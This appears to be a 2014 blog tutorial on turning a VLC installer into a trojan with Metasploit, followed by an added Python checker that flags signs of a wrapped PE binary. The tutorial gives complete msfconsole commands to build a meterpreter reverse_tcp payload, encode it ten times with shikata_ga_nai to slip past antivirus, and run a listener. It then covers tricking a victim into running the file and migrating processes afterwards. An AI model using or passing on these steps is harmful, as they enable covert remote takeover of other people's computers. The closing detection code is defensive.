Sunday 4 May 2014

Backtrack :- Defeat antivirus with Shikata encoder

Using Metasploit, it is possible to combine a meterpreter session with a completely benign executable.
In the last article we learnt how to use the Windows Solitaire game to hack a PC; this time we will use another program, VLC media player, to hack a PC!
Continuing... when a user executes our executable, a meterpreter session is opened to a remote machine, essentially giving it full access to the exploited machine.
Let's take an application and use the reverse_tcp attack.
$ Choose an executable, VLC for example, and download it to the desktop.
$ Set up the new malicious executable using the reverse_tcp module to allow remote access to the machine by providing an appropriate local IP address and local port for the TCP handler to connect back to once executed on the remote machine.
$ We will encode the exe 10 times using shikata_ga_nai to hide from the antivirus long enough for a meterpreter session to be opened.
Open up msfconsole and enter
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4444
generate -e x86/shikata_ga_nai -i 10 -x /root/Desktop/vlc.exe -k -t exe -f /root/Desktop/vlc2.exe
$ Now we set up a handler session in Metasploit that matches the IP and port parameters specified in the malicious generated executable.
Open msfconsole again and enter
use exploit/multi/handler
set LHOST 192.168.1.3
set LPORT 4444
exploit
$ Find a means of getting the encoded executable onto the victim system either by means of sneakernet or email and have the user open it.
One interesting thing at this time is that the antivirus will present a dialogue box saying that a malicious file has been detected, but by the time the file is detected, a meterpreter session will already have been opened!!!
As soon as the meterpreter session opens, it is essential to migrate to another process, thereby reducing the chance of the session terminating. First list the processes, then migrate (providing the Process ID, not the name):
ps
migrate <process ID>
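On the defending side, the weak spot of this technique is that the backdoored installer is no longer the vendor's binary: wrapping a payload around a template typically adds a new section that is both writable and executable and moves the entry point into it, while the original code signature no longer verifies. The following stdlib-only checker is an added example, not code from the post or from Metasploit; it parses the PE section table and flags those two structural signs, using constructed header-only PE images as test data (the section layout of a real wrapped binary is an assumption here, and a hash or Authenticode check against the vendor's download remains the authoritative test).

```python
import struct

# PE section characteristic flags (from the PE/COFF spec)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def parse_pe(data):
    """Return (entry_point_rva, [(name, va, vsize, characteristics), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24                       # optional header follows the 20-byte file header
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i         # 40-byte section headers follow the optional header
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va = struct.unpack_from("<II", data, off + 8)
        chars, = struct.unpack_from("<I", data, off + 36)
        sections.append((name, va, vsize, chars))
    return entry_rva, sections

def suspicious_findings(data):
    """Flag RWX sections and an entry point that lives outside .text."""
    entry, sections = parse_pe(data)
    findings = []
    for name, va, vsize, chars in sections:
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name} is writable and executable")
        if va <= entry < va + vsize and name != ".text":
            findings.append(f"entry point 0x{entry:x} is in section {name}, not .text")
    return findings

def build_pe(entry_rva, sections):
    """Construct a header-only PE32 image (constructed test data, no real code inside)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)              # e_lfanew = 64
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva, 0).ljust(224, b"\0")
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), vs, va, 0, 0, 0, 0, 0, 0, ch)
                     for n, va, vs, ch in sections)
    return dos + b"PE\0\0" + file_hdr + opt + table

# Constructed samples: a normal layout, and the layout a template-wrapped binary tends to show
CLEAN = build_pe(0x1000, [(".text", 0x1000, 0x2000, 0x60000020), (".rdata", 0x3000, 0x1000, 0x40000040)])
BACKDOORED = build_pe(0x5000, [(".text", 0x1000, 0x2000, 0x60000020), (".rdata", 0x3000, 0x1000, 0x40000040),
                               (".qwer", 0x5000, 0x1000, 0xE0000020)])   # assumed injected RWX section
```

Run `suspicious_findings()` on a downloaded installer before it is executed; an empty list is not proof of cleanliness, but any finding means the file is not what the vendor shipped.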

